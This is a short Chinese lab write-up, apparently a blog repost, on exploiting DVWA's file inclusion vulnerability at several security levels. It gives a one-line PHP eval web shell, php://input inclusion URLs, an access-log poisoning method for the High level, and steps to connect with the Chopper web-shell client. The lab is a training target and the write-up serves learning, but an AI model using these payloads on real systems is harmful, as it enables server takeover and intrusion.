文件包含靶机

LOW、Medium

包含值是page

使用php://进行http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=php://input

进行post写入小马<?phpeval($_REQUEST[666]);?>

验证http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=php://input&666=phpinfo();

菜刀连接http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=php://input     666

High级别

file://

经过实验值后面只能上传file*,所以利用file://来读取本地的文件

我们可以通过日志文件来进行读取

首先我们先写小马,通过bp,url上写会被转义

更改内容,写上小马,日志里会有

GET/DVWA-master/vulnerabilities/fi/?page= HTTP/1.1

查看日志文件http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=file://D:xamppapachelogsaccess.log

可以看见有666

验证666有没有用http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=file://D:xamppapachelogsaccess.log&666=phpinfo();

用菜刀连http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=file://D:xamppapachelogsaccess.log      666



原文地址:https://www.cnblogs.com/bingtang123/p/12838348.html